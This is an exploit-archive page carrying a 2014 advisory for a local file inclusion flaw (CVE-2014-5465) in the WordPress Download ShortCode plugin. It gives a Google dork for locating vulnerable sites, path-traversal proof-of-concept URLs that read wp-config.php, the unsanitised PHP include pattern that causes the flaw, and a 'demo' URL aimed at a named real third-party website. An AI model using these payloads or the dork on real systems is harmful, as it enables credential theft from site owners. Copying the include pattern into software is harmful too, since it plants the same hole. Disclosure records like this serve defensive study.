WordPress ShortCode 0.2.3 Local File Inclusion

WordPress ShortCode 0.2.3 Local File Inclusion: Posted Aug 26, 2014; Authored by Christian Galeone, Mehdi Karout; WordPress ShortCode plugin version 0.2.3 suffers from a local file inclusion vulnerability. Note that this finding houses site-specific data.; tags | exploit, local, file inclusion; advisories | CVE-2014-5465; SHA-256 | ef4485a00a05196cc2ba090494ef148cd178da683b19a50a019daa50233fd67d; Download | Favorite | View

WordPress ShortCode 0.2.3 Local File Inclusion

#################################################################################################
#
# Title                : WordPress ShortCode Plugin - Local File Inclusion Vulnerability
# Severity             : High+/Critical
# Reporter(s)          : Mehdi Karout & Christian Galeone
# Google Dork          : inurl:wp/wp-content/force-download.php
# Plugin Version       : 0.2.3
# Plugin Name          : Download ShortCode
# Vendor Home          : http://werdswords.com/
# Date                 : 25/08/2014
# Tested in            : Win7 - Kali Linux
# CVE                  : CVE-2014-5465
#
##################################################################################################
#
# PoC :
#
#
# http://localhost:80/wordpress/wp/wp-content/force-download.php?file=[File]
#
# http://localhost:80/wordpress/wp/wp-content/force-download.php?file=../wp-config.php
#
# Exploit Code :
#
#    $file = $_GET['file'];
#  if(isset($file))
#  {
#      include("pages/$file");
#  }
#  else
#  {
#      include("index.php");
#  }
# 
# Demo :
#
# http://llyndamoreboots.com/wp/wp-content/force-download.php?file=../wp-config.php
#
##################################################################################################

Top Authors In Last 30 Days

Red Hat 308 files
Ubuntu 67 files
Debian 24 files
Gentoo 8 files
Google Security Research 7 files
LiquidWorm 6 files
Apple 5 files
Jann Horn 3 files
Spencer McIntyre 3 files
Milad Karimi 3 files

File Archives

Systems

AIX (430)
Apple (2,133)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,177)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,160)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,495)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,025)
UNIX (9,482)
UnixWare (188)
Windows (6,786)
Other

WordPress ShortCode 0.2.3 Local File Inclusion

WordPress ShortCode 0.2.3 Local File Inclusion

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

WordPress ShortCode 0.2.3 Local File Inclusion

Share This

WordPress ShortCode 0.2.3 Local File Inclusion

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems